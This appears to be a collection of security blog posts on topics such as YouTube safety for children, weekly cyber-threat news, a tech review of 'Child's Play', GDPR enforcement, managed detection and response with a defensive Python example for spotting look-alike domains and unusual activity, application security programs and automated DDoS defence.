  • Do you understand why it’s important to filter YouTube content and respect age limits (inappropriate content, cyberbullying)?
  • Do you understand why unboxing and makeup videos are so popular (advertisers want you to purchase)?
  • Do you understand why we need to balance screen time this summer (mental and physical health)?
  • Do you know why this piece of content might be fake or contain questionable information (conspiracy, hate, or political videos)?

As the public increasingly demands social networks do more to remove harmful or objectionable content, one thing is clear: Despite strides in this area by a majority of platforms, no online social hub is (or will likely ever be) 100% safe. The best way to keep kids safe online is by nurturing a strong parent-child connection and having consistent conversations designed to equip and educate kids about digital risks and responsibility.

The post Kids Obsessed with YouTube? How to Help Them Stay Balanced, Safe This Summer appeared first on McAfee Blogs.

This Week in Security News: Cyberespionage Campaigns and Botnet Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a cyberespionage campaign targeting Middle Eastern countries and a botnet malware that infiltrates containers via exposed Docker APIs.

Read on:

Hackers Are After Your Personal Data – Here’s How to Stop Them

The latest FBI Internet Crime Complaint Center (IC3) report paints an accurate picture of the scale of online threats and shows that consumers need to take urgent steps to protect their most sensitive identity and financial data from online attackers.

Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East

Trend Micro uncovered a cyberespionage campaign targeting Middle Eastern countries and named it “Bouncing Golf” based on the malware’s code in the package named “golf.” 

Trend Micro Partners with VIVOTEK to Enhance IP Cameras Security

Trend Micro announced it has blocked 5 million attempted cyberattacks against IP cameras in just five months. Through its strategic partnership with VIVOTEK, Trend Micro’s IoT security solutions are embedded in globally deployed IP cameras to provide superior protection.

AESDDoS Botnet Malware Infiltrates Containers via Exposed Docker APIs

Trend Micro details an attack type where an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community allows attackers to infiltrate containers and run a variant of the Linux botnet malware AESDDoS.

Ransomware Repercussions: Baltimore County Sewer Charges, 2 Medical Services Temporarily Suspended

A ransomware attack in May prevented the Baltimore City and County governments from mailing the annual water and sewage tax bills to its residents due to unverifiable accounts of abnormally low or no water consumption in 2018. 

Hackers Have Carried Out 12 Billion Attacks Against Gaming Sites in 17 Months

Hackers have targeted the gaming industry by carrying out 12 billion credential stuffing attacks against gaming websites in 17 months, according to a new report by internet delivery and cloud services company Akamai. 

Critical Linux and FreeBSD Vulnerabilities Found by Netflix, Including One That Induces Kernel Panic

A Netflix researcher uncovered four critical vulnerabilities within the TCP implementations on Linux and FreeBSD kernels that are related to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. 

New Oracle WebLogic Zero-day Vulnerability Allows Remote Attacks Without Authentication

Oracle published an out-of-band security alert advisory on CVE-2019-2729, a zero-day deserialization vulnerability that could allow remote attackers to execute arbitrary code on targeted servers.

Xenotime, Hacking Group Behind Triton, Found Probing Industrial Control Systems of Power Grids in the US

The hacking group, Xenotime, behind intrusions targeting facilities in oil and gas industries has started probing industrial control systems (ICSs) of power grids in the U.S. and the Asia-Pacific region, researchers reported.

Data Breach Forces Medical Debt Collector AMCA to File for Bankruptcy Protection

US medical bill and debt collector American Medical Collection Agency (AMCA) has filed for bankruptcy protection in the aftermath of a disastrous data breach that resulted in the theft of information from clients including Quest Diagnostics, LabCorp, BioReference Laboratories and more.

Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

Trend Micro observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread from an infected host to any system that has had a previous SSH connection with the host.

Hacker Groups Pounce on Millions of Vulnerable Exim Servers

Multiple groups are launching attacks against exposed Exim mail servers, trying to exploit a vulnerability that could give them permanent root access.

Florida City to Pay $600K Ransom to Hacker Who Seized Computer Systems Weeks Ago

Riviera Beach is paying $600,000 in Bitcoins to a hacker who took over local government computers after an employee clicked on a malicious email link three weeks ago.

Are you up-to-date on the best ways to lower the risk of hackers accessing your personal data? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cyberespionage Campaigns and Botnet Malware appeared first on .

Movie Tech Review: Child’s Play 2019

BETRAYED: A Trend Micro Child's Play Tech Review

A while back, Rik & Kasia Ferguson shared their thoughts on the movie, “Unfriended: The Dark Web.” The dark web and technology in general plays a pivotal role in the movie’s plot, so the team decided it would be interesting to have a real-world expert review.

Everyone had a lot of fun, and thus Trend Micro movie reviews were born. I was “fortunate” enough to get the next call. The downside? The movie is, “Child’s Play” and I don’t do horror movies well.

Opening night, I powered through, watched the movie and was…pleasantly surprised?

The Movie

Was there too much gore and violence? Absolutely. However, the movie was a lot better than I expected, with an eerie performance by Mark Hamill as the voice of Chucky. Aubrey Plaza, as Karen, played her role well, which added the only real-relatable character of any depth beyond Chucky.

How does this movie rate in the horror genre? No idea. What I do know is that I enjoyed it more than I expected—which was, an admittedly low bar—and found myself entertained for the duration.

[ Spoilers ahead: scroll down if you’re ok with that ]

⬇

Bad Training Data

Unlike the original entries in the series, this edition brings Chucky into the 21st century. Chucky is no longer a demonically possessed doll, but a blank slate in the form of a nascent AI in a robotic toy doll.

As with any AI or machine learning model, the AI starts off neutral. It requires training data in order to generate results. In Chucky’s case, he is a unique example of the “Buddi” product.

In a classic insider supply chain attack, a QA employee is fired by an overly abusive boss, but before he’s removed from the property, the employee is ordered to finish one last Buddi doll: Chucky.

This employee modifies Chucky’s code to remove any boundary checking for his core behaviours. This creates a truly unbounded, clean slate for the AI that is set out into the world.

Skipping ahead, Chucky is trained on a biased data set. This bias is the naive world view of a group of kids and their run-down neighbourhood. Chucky is exposed to crude humour, horror movies and heated emotional commentary…all without the context to process it.

This tunes the AI to generate the psychotic behaviour that fuels the rest of the movie.

IoT Insecurity

One of the features of this 21st century Buddi doll is the ability to control your smart home. Think of the doll like a walking Alexa or Google Home. Of course, there’s zero authentication or information security controls in place.

Once he’s synced with the latest update from the cloud, Chucky can simply wave his tiny finger and control the devices around him.

This leads to a number of issues around privacy (in this case, used to increase the suspense and move the plot forward) that mirror cases we’ve seen in the real world.

3rd party access to smart speakers to terrorize unsuspecting victims, remote viewing of private video streams, and manipulation of key devices, like thermostats, have all happened already in the real world, but not by rogue AIs.

…yet.

Lateral Movement

In the movie’s climax, Chucky really lets loose. He comes into his digital powers and starts to wreak havoc. Our heroes and supporting cast struggle to respond to this maniacal behaviour. The interesting point is that Chucky has developed enough as a character by this point to understand that it’s not maniacal behaviour from his perspective. To him, it’s perfectly reasonable. This underscores the fact that AI is only as good as its training data and won’t highlight bad results from a bad model.

While striving to reach his goal, Chucky—a trusted endpoint in the corporation’s services network—reaches out to all of the compatible devices within his local area.

This type of lateral movement is extremely common in today’s cyberattacks.

The movie presents the issue in an overly dramatic fashion (it is a movie after all), but the point stands up. Most technologies, IoT specifically, are generally designed with two types of endpoints: trusted and untrusted.

Security and privacy controls are then designed to prevent untrusted endpoints from accessing trusted endpoints. Trusted endpoints have little to no verification applied when communicating with each other.

In “Child’s Play”, this results in disastrous consequences. In the real world, too.

The movie is a stark—and bloody—reminder that networks and systems need visibility across all endpoints and layers and layers of security and privacy controls.

Takeaways

The way the movie leverages poor AI training, a lack of IoT security, and lateral movement techniques is intriguing, but what really caught my attention is the larger trend within the horror and suspense genre.

Films are moving away from fantasy and otherworldly villains to digital ones. That’s a reflection of how big a role technology plays in our lives, as well as the general lack of deep understanding of how it works.

For me—and the security community—that’s a big challenge: helping people understand cybersecurity and privacy in context.

If you’re looking for a fun suspense film with a technology slant, I would—shockingly—recommend watching this movie. As long as you have realistic expectations and remember that breaking most current IoT security is…child’s play.

[ 🤣Sorry, couldn’t resist ]

The post Movie Tech Review: Child’s Play 2019 appeared first on .

Adam Levin on CBS This Morning: Catfish Scheme Leads to Murder

Adam Levin was featured on CBS This Morning where he discussed the recent catfish scheme that led to the murder of an Alaska teenager.

Levin warned that young people are especially vulnerable to online manipulation:

“You can ruin your entire life in a matter of minutes based on what you see, what you do and how you react to people online… Do not believe everything you see or hear online.”


The post Adam Levin on CBS This Morning: Catfish Scheme Leads to Murder appeared first on Adam Levin.

Will Business Lose Its Cookies Over These New Privacy Laws?

Last month marked the one-year anniversary of the European Union’s General Data Privacy Regulation, or GDPR. Since then, California and New York State have created similar bills aimed at protecting the privacy of their citizens. Nevada has recently enacted a narrow privacy law. Meanwhile, privacy is dead.

Long Live Privacy!

While privacy legislation seems like common sense in the surveillance economy, where unimaginatively intrusive data tracking and compiling is commonplace, even the GDPR’s strongest proponents say the launch of the EU’s much vaunted privacy protections was pretty rocky. While California has passed similar strict legislation, it does not take effect until 2020, and as regulations required for its implementation are being promulgated, there is enormous pressure being brought to bear by various business and industry lobbying groups to water it down. New York’s Privacy Act might up the ante for no-can-do in the realm of who-are-you with even more stringent prohibitions than put in place by California’s Consumer Privacy Act (CCPA).

At this anniversary time, it’s worth looking at what has and hasn’t worked in Europe.

The Good, the Bad, or the Woefully Ineffective?

Looking at the numbers released by the EU, familiarity with the law itself has been one of its greatest successes: Sixty-seven percent of Europeans have heard of the GDPR, and there were 144,376 queries and complaints reported in its first year. Add to these impressive figures the 89,271 data breach notifications issued, and it’s clear that despite its flaws, the law successfully addresses a set of problems that a more scattershot approach (with multiple statutes enacted by different EU member states) was unable to achieve.

Where the GDPR comes up short is enforcement: While the law includes fines for the mishandling of data for up to 4 percent of a company’s annual global revenue, the actual numbers so far have been underwhelming. Far from preventative, they almost encourage bad cybersecurity. Take Google. The company was fined €50 million (roughly $57 million) for lack of consent on advertisements–not a big number for them–and this fine comprised the bulk of the €56 million of fines levied in total.

Needless to say, for Google a fine of this nature would be an acceptable cost of doing business in the EU.

It is anticipated that heavier fines will be placed on companies under the GDPR going forward, Facebook most likely being the poster child, but the message so far is clear: Fines need to hurt if the goal is the deterrence of poor data practices.

The Biggest Issue

By far the largest flaw in the GDPR has been a lack of clarity caused by poor communication.

Even though 67 percent of Europeans have heard of the GDPR, only 20 percent know which public authority is responsible for it. Misinformation combined with the requirement for 72-hour breach notification set off a deluge to the U.K. data privacy regulator in 2018. One-third of those calls involved incidents well below the GDPR’s threshold. Misconceptions about what exactly was required under the law were so widespread that the Irish Data Protection Commission actually blogged about whether taking pictures of one’s children at a school event is permissible. (It is.)

Corporations have also struggled with what many perceive as the law’s ambiguity. Under the GDPR, “companies processing large amounts of special categories of personal data” are required to hire a data protection officer, or DPO, to ensure compliance. The problem is that the law doesn’t specifically define what “large amounts” are, and although the DPO is required to have “expert knowledge of data protection law,” there is no set definition for what qualifies as an expert, either. It’s a great idea to have someone at large corporations ensuring the careful and lawful handling of customer data, but the implementation is ill-defined by the GDPR, which could make a DPO’s job awkward or downright impossible.

The kinds of confusion caused by the GDPR seem contagious, and that’s just the nature of the beast. There are many stakeholders in the privacy racket, and they are often vigorously at odds with one another.

The privacy laws in the U.S. will be more of the same. The best innovation when it comes to the GDPR was that it created one law instead of a patchwork that might change the moment you crossed a border. While New York and California should be applauded for taking steps to protect the privacy and data of their citizens, having multiple sets of requirements for websites and businesses alike (as we have witnessed with more than 50 U.S. jurisdictions’ having individual and not necessarily complementary breach notification laws) will necessarily lead to widespread difficulty in their implementation and accessibility.

Perhaps the most important takeaway for any state wishing to mirror the data protections of the GDPR is that in order to be privacy-friendly and consumer-friendly, the application of the law itself should at least try to be user-friendly, too. Too many differences run the risk of any and all of these laws being accepted as gnats to be clicked away when we visit our favorite websites–and that is a giant fail.

Laws are supposed to solve problems, and keep others from happening. When it comes to privacy, we have a long way to go.

The post Will Business Lose Its Cookies Over These New Privacy Laws? appeared first on Adam Levin.

Cyber News Rundown: GPS Vulnerabilities in Tesla Vehicles


Multiple Tesla Models Vulnerable to GPS Attacks

Though it’s not the only manufacturer to offer GPS navigation in their vehicles, Tesla has once again suffered an attack on their GPS autopilot features. These attacks were able to trick the car into thinking it had arrived at an off-ramp more than two miles early, causing it to start to merge and eventually turn off the road entirely, even with a driver attempting to stop the action. Using off-the-shelf products, the test conductors were able to gain control of Tesla’s GPS in less than a minute.

Oregon DHS Successfully Phished

The personally identifiable information for at least 645,000 Oregon Department of Human Services (DHS) patients was illicitly accessed after a successful phishing attack on nine DHS employees. The attack allowed the hackers to obtain 2 million emails from the accounts, which contained everything from names and birthdates to social security numbers and confidential health information. Fortunately, the DHS issued a password reset shortly after the initial breach that stopped the attackers from getting any further and began contacting potential victims of the attack.

IP and Computer Blacklisting in New Ryuk Variant

The latest variant of the Ryuk ransomware includes an IP blacklist and a computer name check prior to beginning encryption. The IPs and computer name strings were likely implemented to stop any encryption of Russian computer systems. After these checks, the ransomware continues as normal using .RYK as the appended file extension and a ransom note that points victims to make payments to one of two proton mail accounts.

EatStreet Ordering Services Breached

A data breach is affecting the food ordering service EatStreet and possibly all of its 15,000 partnered restaurants. Payment card information for millions of customers using the app, along with some banking information for the 15,000 business partners, is believed to have been compromised in the breach. Though EatStreet quickly began improving their security and implementing multi-factor authentication following the breach, the damage was already done.

Fake System Cleaners on the Rise

While phony system cleaner apps have been common for many years, a recent study shows that user numbers for these apps have doubled from the same time last year to nearly 1.5 million. These apps often appear innocent and helpful at the outset, while others have begun taking an outright malicious approach. To make matters worse, these apps are commonly installed to fix the very issues they later create by slowing the computer down and causing annoying popups.

The post Cyber News Rundown: GPS Vulnerabilities in Tesla Vehicles appeared first on Webroot Blog.

How organisations can effectively manage, detect and respond to a data breach?

Guest article by Andy Pearch, Head of IA Services at CORVID

78% of businesses cite cyber security as a high priority for their organisation’s senior management. Whilst it is encouraging that this figure has risen year on year, generating awareness of cyber security is only one part of the issue. The next step for organisations to take is not only understanding, but intelligently acting on the risks presented. Despite the heightened awareness, many organisations are still focusing on mitigating assumed risks, rather than real risks, without a robust security strategy in place.

Whilst perimeter security is a key part of any organisation’s security posture, the fact is that it cannot work in isolation. Data breaches are now commonplace and largely regarded as inevitable, and the rise of new technologies means that today’s threats have increased in sophistication. As Andy Pearch, Head of IA Services at CORVID, explains, safeguarding data integrity, confidentiality and availability should be fundamental to all cyber security strategies. After all, it is the speed with which a breach is detected and the effectiveness with which it is remediated that will provide the most value – this can be achieved with a strategic Managed Detection and Response solution.

Unidentified attacks
The Government’s Cyber Security Breaches Survey 2019 revealed that in the last 12 months alone, almost one third of UK businesses identified cyber security breaches or attacks. What’s more, the research also showed that just under half of these companies identified at least one breach or attack per month. While these figures should be enough to make a business refocus its strategic security thinking, it is the use of the word ‘identified’ that is significant: many more attacks could have occurred, but not yet been discovered.

Indeed, global figures reveal that the median dwell time – the time a criminal can be on a company’s network undetected – is over 100 days. And in many cases, the breach is not revealed by the security team itself; it is a call from a supplier, a customer or business partner that brings the problem to light, typically following the receipt of a diversion fraud email requesting, for example, that future payments should be sent to a different bank account.

These breaches not only have the ability to undermine business relationships, but in some cases, can also incur significant financial liability. These frauds usually follow one of two forms: either impersonation, where a criminal masquerades as the business using a very similar domain name and email address, or following a successful compromise, the email comes from the company’s own system. It is the latter case that raises the issue of liability for any financial losses a business partner may have suffered.

Asking the tough questions
Alongside phishing attacks, this approach to cyber attacks completely bypasses the traditional cyber security methods, such as anti-virus (AV) software and firewalls, upon which so many companies still rely. Indeed, while 80% of businesses cite phishing attacks as the cause of breach, 28% confirm the cause was the impersonation of an organisation in emails or online. Only 27% cite viruses, spyware or malware, including ransomware attacks, as the root cause of the breach.

Many companies still depend on perimeter security, and for those that do, it is time to ask some serious questions. Firstly, can you be 100% confident that your business has not been compromised? How would you know if the attacker has not used malware or a virus that would be picked up by the perimeter defences? Secondly, even when a compromise is identified, many companies aren’t sure what the next steps should be. If a supplier makes the call to reveal the business has been compromised, can you confidently identify where that occurred? What part of the business has been affected? What is the primary goal of the attack? Is the attacker only leveraging a compromised email system to defraud customers, or aiming to gain intellectual property or personal data?

The GDPR has demonstrated that the risk associated with a cyber attack is not only financial, as hackers are also actively seeking to access personal information. Security plans, therefore, must also consider data confidentiality, integrity and availability. But it is also essential for organisations to accept that protection is not a viable option given today’s threat landscape: a fundamental shift in security thinking is required. When hackers are using the same tactics and tools as genuine users, preventing these attacks is impossible. Rapid detection and remediation must be the priority.

Removing the burden
Managed Detection and Response (MDR) enables an organisation to spot the unusual activity that indicates a potential breach. For example, if a user is accessing files they would never usually open or view, sending unexpected emails or reaching out to a new domain, such activity should prompt a review. The problem for most companies, however, is they lack not only the tools to detect this activity but also the time and skills to analyse whether it is a breach or actually a false positive.
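The two signals described above (the diversion fraud and impersonation emails in the "Unidentified attacks" section, and the MDR review of activity a user has never shown before) as an added example, not CORVID's code. It runs over constructed log lines and emails; the partner domains, user names, phrases and edit-distance threshold are assumptions chosen for illustration.

```python
"""Added example (not from CORVID or the article): the breach signals the
article describes, checked over constructed data.

1. Diversion fraud: a sender domain that nearly matches a trusted partner's
   domain (impersonation), or a mail asking to change payment details sent
   from the company's own domain (the post-compromise, liability case).
2. MDR anomaly review: a user contacting a domain or opening a file share
   that never appeared in their baseline activity.
"""
from collections import defaultdict

# Constructed: partner domains the business legitimately deals with.
TRUSTED_PARTNER_DOMAINS = {"acme-supplies.example", "northwind.example"}

# Constructed: phrases typical of a payment diversion request.
PAYMENT_CHANGE_PHRASES = ("new bank account", "updated bank details", "change of account")

# Constructed logs, format: "<user> <action> <target>".
BASELINE_LOG = [
    "alice dns crm.example",
    "alice file smb://finance/invoices",
    "bob dns crm.example",
]
REVIEW_LOG = [
    "alice dns crm.example",
    "alice dns payments-portal.example",   # new domain for alice
    "bob file smb://hr/payroll",           # bob never touched this share
]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot look-alike domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_partner(sender_domain: str, max_distance: int = 2):
    """Return the trusted domain this sender imitates, or None.

    An exact match is legitimate; a small edit distance (assumed threshold
    of 2) is treated as a look-alike domain.
    """
    if sender_domain in TRUSTED_PARTNER_DOMAINS:
        return None
    for trusted in TRUSTED_PARTNER_DOMAINS:
        if edit_distance(sender_domain, trusted) <= max_distance:
            return trusted
    return None


def classify_email(sender: str, subject: str, body: str, own_domain: str) -> list:
    """Flag the two diversion-fraud forms the article describes."""
    findings = []
    domain = sender.rsplit("@", 1)[-1].lower()
    text = f"{subject} {body}".lower()
    asks_for_change = any(p in text for p in PAYMENT_CHANGE_PHRASES)
    imitated = lookalike_partner(domain)
    if imitated:
        findings.append(f"impersonation: {domain} resembles {imitated}")
    if asks_for_change and domain == own_domain:
        # Payment-change request leaving our own mail system: the case that
        # points at a compromised internal account.
        findings.append("possible compromised internal account: payment change request")
    elif asks_for_change:
        findings.append("payment change request from external sender")
    return findings


def parse_log(lines):
    """Turn constructed '<user> <action> <target>' lines into tuples."""
    return [tuple(line.split()) for line in lines]


def build_baseline(events):
    """Per-user set of (action, target) pairs seen during the quiet period."""
    baseline = defaultdict(set)
    for user, action, target in events:
        baseline[user].add((action, target))
    return baseline


def review_activity(baseline, events):
    """Return events never seen for that user in the baseline: the unusual
    activity that should prompt an analyst review."""
    return [(u, a, t) for u, a, t in events if (a, t) not in baseline[u]]


if __name__ == "__main__":
    print(classify_email("accounts@acme-supp1ies.example", "Updated bank details",
                         "please pay to the new account", own_domain="corp.example"))
    print(review_activity(build_baseline(parse_log(BASELINE_LOG)), parse_log(REVIEW_LOG)))
```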

A managed approach not only takes the burden away from the business, but also enables every company to benefit from the pool of knowledge gathered by detecting and remediating attacks on businesses across the board. With MDR, every incident detected is investigated and, if it’s a breach, managed. That means shutting down the attack’s communication channel to prevent the adversary communicating with the compromised host, and identifying any compromised assets – this can then either be remediated in-house, if preferred, or as part of the MDR service.

Information relating to the mode of attack is also collected. This timely, actionable intelligence is immediately applied to the MDR service, creating either a prevention or detection technique to minimise the chance of this approach succeeding again. Because of this, the speed with which attacks can now be detected is compelling: whilst the average dwell time has continued to decrease in recent years, it is now entirely possible for unknown malware to be detected and nullified within the hour.

Reflect and act
The threat landscape is continuously evolving – it’s important for organisations to recognise this and match security strategies to the true level of risk. What’s more, whilst the increased commitment to security at a Board level is encouraged, organisations cannot equate expenditure with effectiveness.

Organisations must reflect and consider not only the consequences of data loss, but of integrity and availability too. Security strategies can no longer rely on users not making mistakes; when a breach occurs, an organisation must know what happened.

Security strategies cannot afford to stand still. With the rise in phishing and diversion fraud, it is not enough for organisations to simply lock down the perimeter. Companies cannot prevent all attacks, but when a compromise occurs, it is essential to understand how, when and why the attack succeeded so the appropriate response can be determined, and learnings can be applied for the future. It is only with this process in place that organisations can safeguard their business, data and reputation.

Weekly Update 144


So first things first - my patience for the Instamics we're wearing just reached zero. One of them recorded and one of them didn't, which means we've had to fall back to audio captured by the iPhone I was recording from, so apologies it's sub-par. I ended up just uploading the unedited clip direct from the phone because frankly, after trying to recover the non-existent audio, both my time and patience were well into the red.

Be that as it may, there's video, audio and a narrative to tell both around the NDC event Scott and I are at and the progress of "Project Svalbard". I'm trying to share as much as I can about that process as things progress and I hope people appreciate the transparency I've always run HIBP with. As I say in the video, if you've got questions about it then drop them in the comments section below.


References

  1. Scott wrote about maintaining state in a Cloudflare worker (this is a fundamental part of how we're able to process 670M reports a day!)
  2. Check out how much HIBP trended in searches in January (yes, that's a direct map to my stress levels and yes, I will send stickers to anyone who creates that site I mentioned!)
  3. Project Svalbard is forging ahead (it's becoming increasingly demanding, but it's also a very exciting time)
  4. Varonis is sponsoring my blog again this week (check out their Varonis DFIR team investigating a cyberattack using their data-centric security stack)

Beware! Email attachments can make you victim of spear phishing attacks

In the last few months, we’ve seen a sudden increase in Spear Phishing attacks. Spear phishing is a variation of a phishing scam wherein hackers send a targeted email to an individual which appears to be from a trusted source. In this type of attack, the attacker uses social engineering tricks and some…

Live From Gartner Security & Risk Mgmt Summit: Starting an AppSec Program, Part 2

This is part two of a two-part blog series on a presentation by Hooper Kincannon, Cyber Security Engineer at Unum Group, on “Secure from the Start: A Case Study on Software Security” at the Gartner Security & Risk Management Summit in National Harbor, MD. In this presentation, Hooper provided a great blueprint for starting a DevSecOps program. In part one, I summarized how Hooper got buy-in for his program and his overall plan for the initiative. In this blog, we delve into the details.

Using Different Assessment Types for the Right Purpose

Hooper kindly shared his slides with us. Here is his helpful comparison of different assessment types, focusing on static analysis, dynamic analysis and manual penetration testing:

You have to make a choice about which route you’d like to take. In Hooper’s case, he decided to build static and dynamic application security into the SDLC.

Dynamic and Static Analysis Workflow

For dynamic analysis testing, Hooper recommends the following workflow:

To make your DAST assessments successful, he recommended using a consistent scan duration, considering the various authentication mechanisms, and using the testing credentials only for testing.

For static analysis testing, he recommended the following workflow:

His recommendations for static analysis testing included being conscious of how you define applications, being aware of compilation instructions, and consistency of the process.

Understanding Remediation vs. Mitigation

After you have identified a vulnerability, you can address it in two different ways:

  • Remediation: Fixing the security defect by changing the code that contains the defect or making a configuration change. This eliminates the risk.
  • Mitigation: Implementing controls to make it less likely that the vulnerability is exploited. This reduces the risk but does not eliminate it because the vulnerability is still present in the code.

Working With Scanning Results

How you use your scan results can make or break your program. If you’re fortunate, you’ll scan your application and get back a low volume of flaws. If you’re unlucky, it may be the opposite.

Hooper’s biggest recommendation is not to panic: The overall goal is to reduce risk, and that won’t happen overnight. Take your time to digest the results and discuss how to best prioritize them. For example, consider fixing dynamic results first because they are easier to discover by an attacker. Decide what you accept as trusted sources, especially in the case of input validation, and have a process for handling exceptions, such as acceptable risk, mitigations, and false positives. Hooper recommends that you do a readout of the results with the stakeholders.

Picking the Right Metrics to Report On

Metrics are probably the most important deliverable coming out of your program. Security is a difficult metric to measure; reduction in risk is a bit easier.

Metrics that worked for Hooper are:

  • Flaw density
  • Risk reduced (vulnerability severity reduced)
  • Most common flaw types (use to guide education efforts)
  • Compliance over time
  • Onboarding time + other operation metrics

When presenting to the different stakeholders of the program, be aware of what each constituency is interested in – because it varies:

  • CISO + senior management: Profitability of the investment
  • Business leaders: Resource allocation
  • Development: Staying on top of flaws

Keeping a regular cadence is vital. Hooper has made these activities part of his program:

  • Monthly scorecards
  • Monthly executive dashboards
  • Annual reviews
  • Real-time dashboards for developers

Optimizing the Program in Year Two

One year after starting the program, Hooper had reached success with external high-risk applications. Next, he moved on to internal high-risk applications. In addition, he started to automate more and more of the program to make it repeatable and easier to manage. For most organizations, he recommends starting out with automation from day one, but even if you start out manually, you’re taking a step in the right direction.

Here is a picture of how Unum Group integrates Veracode into their SDLC:

For More Information

If you’re interested in starting your own application security program, read our take on Everything You Need To Know About Getting Application Security Buy-In.

Live From Gartner Security & Risk Mgmt Summit: Starting a Web Application Security Program

Bootstrapping an application security program is hard. Technology is only one part of the equation. You need to inventory your applications, get stakeholders on board, and then execute on the holy trinity of people, process, and technology. That’s why I was excited to see Hooper Kincannon, Cyber Security Engineer at Unum Group, present on “Secure from the Start: A Case Study on Software Security” at the Gartner Security & Risk Management Summit in National Harbor, MD. Hooper provided a great blueprint for starting a DevSecOps program.

Sixty Vulnerabilities Are Reported Every Day, 27 Percent Are Never Fixed

Hooper began his presentation by outlining the current state of both software and software security. He points out that while software is changing the world, it is also fundamentally flawed from a security perspective.

He points to some highlights from a study by Risk Based Security:

  • More than 22,000 vulnerabilities were disclosed in 2018 – that’s about 60 per day.
  • Almost a third of these (27%) were never fixed, so security professionals can’t just deploy a patch to improve their security posture.
  • Web-related vulnerabilities accounted for nearly half of all reported security flaws, and more than two thirds were related to insufficient or improper validation of input.
  • 33% received a severity rating of seven or above.
  • The OWASP Top 10 still accounts for two-thirds of the reported vulnerabilities.

What can we do about it? We can develop a secure software development lifecycle and try to stem the flow of the vulnerabilities being published in the first place. This is becoming increasingly difficult because more lines of code are being written than ever before (111 billion lines of code in 2016, trending up).

Software Is Becoming Mission Critical: Making the Case for AppSec

So what if Alexa won’t work or my app crashes? Both would probably only be minor annoyances, but software is also impacting us on a much larger scale. Not too long ago, people would be lucky if they had only a two-minute warning that a tornado was coming. Today, weather monitoring and modeling software can predict the formation and path of a tornado with stunning accuracy. Better still, it can send text messages to those in danger – providing precious minutes to find shelter.

Farming is being transformed by software as well. Software monitors the moisture levels in soil, and irrigation systems connected to these sensors release the optimal amount of water into the soil. This way, the crops have what they need to grow, and not a drop of water is wasted. There are technologies that monitor crop growth and health and even harvest crops. In other words, software is tackling world hunger. That’s something worth protecting.

When you want to demonstrate to your stakeholders why application security is important to your organization, go back to your company’s mission and ladder up your argument to this ultimate goal. Unum offers disability, life and financial protection to its customers. If your mission is to help people at their most vulnerable moments in life, you need to ensure that they don’t have to worry about their identity being stolen as the result of a data breach in addition to having to figure out medical payments. Making this connection with the core mission can really help tell a story of why application security is crucial to the business.

Starting Out With the Right Questions

Before you can dive head first into your DevSecOps program, you need to ask yourself the right questions:

  • Do you know your application portfolio?
  • Do you have web application security policies defined?
  • Who is responsible for the web application security program?
  • Who is going to fund the program?
  • What is your goal?

Only once you have answered these questions will you be able to find the right formula for your organization. Hooper laid out his program in the rest of the talk, but your organization may differ, so make sure that you ask these questions at the outset.

Building a DevSecOps Program from Scratch

Hooper started at Unum about three years ago as a member of their threat and vulnerability management team. At that point in time, they didn’t have a true web application security program, but they had a relationship with Veracode to assess their top-tier applications, and they were doing basic dynamic analysis with another vendor. At that point, Hooper was fortunate enough to get funding to help expand and mature the program.

Unum’s primary goal was to reduce risk, so he set out to discover and rate the risk of all of their applications. He helped define security policies for all web applications, including expectations and remediation SLAs. They also decided that security should be responsible for the administration of the AppSec program, and development would cover remediation.

Hooper chose to expand his relationship with Veracode, covering SAST, DAST, SCA, and eLearning. He also partnered with Veracode to provide live trainings for developers, and signed up for their program management and application security consulting services, which help onboard scrum teams and help developers fix security defects if they get stuck.

In a follow-up blog, we will delve into the details of Hooper’s AppSec program and his path to AppSec maturity.

Blocking DDoS Attacks Using Automation

Guest article by Adrian Taylor, Regional Vice President at A10 Networks

DDoS attacks can be catastrophic, but the right knowledge and tactics can drastically improve your chances of successfully mitigating attacks. In this article, we’ll explore the five ways, listed below, that automation can significantly improve response times during a DDoS attack while assessing the means to block such attacks.

Response time is critical for every enterprise because, in our hyper-connected world, DDoS attacks cause downtime, and downtime means money lost. The longer your systems are down, the more your profits will sink.

Let’s take a closer look at all the ways that automation can put time on your side during a DDoS attack. But first, let’s clarify just how much time an automated defence system can save.

Automated vs. Manual Response Time

Sure, automated DDoS defence is faster than manual DDoS defence, but by how much?

Andy Shoemaker, founder and CEO of NimbusDDoS, recently conducted a study to find out. The results spoke volumes: automated DDoS defence improves attack response time five-fold.

The average response time using automated defence was just six minutes, compared to 35 minutes using manual processes, a staggering 29-minute difference. In some cases, the automated defence was even able to eliminate response time completely.

An automated defence system cuts down on response time in five major ways. Such systems can:

  • Instantly detect incoming attacks: Using the data it has collected during peace time, an automated DDoS defence system can instantly identify suspicious traffic that could easily be missed by human observers.
  • Redirect traffic accordingly: In a reactive deployment, once an attack has been detected, an automated DDoS defence system can redirect the malicious traffic to a shared mitigation scrubbing center – no more manual BGP routing announcements of suspicious traffic.
  • Apply escalation mitigation strategies: During the attack’s onslaught of traffic, an automated DDoS defence system will take action based on your defined policies in an adaptive fashion while minimising collateral damage to legitimate traffic.
  • Identify patterns within attack traffic: By carefully inspecting vast amounts of attack traffic in a short period of time, an automated DDoS defence system can extract patterns in real-time to block zero-day botnet attacks.
  • Apply current DDoS threat intelligence: An automated DDoS defence system can access real-time, research-driven IP blocklists and DDoS weapon databases and apply that intelligence to all network traffic destined for the protected zone.

An intelligent automated DDoS defence system doesn’t stop working after an attack, either. Once the attack has been successfully mitigated, it will generate detailed reports that you can use for forensic analysis and for communicating with your stakeholders.

Although DDoS attackers will never stop innovating and adapting, neither will automated and intelligent DDoS protection systems.

By using an automated system to rapidly identify and mitigate threats with the help of up-to-date threat intelligence, enterprises can defend themselves from DDoS attacks as quickly as bad actors can launch them.

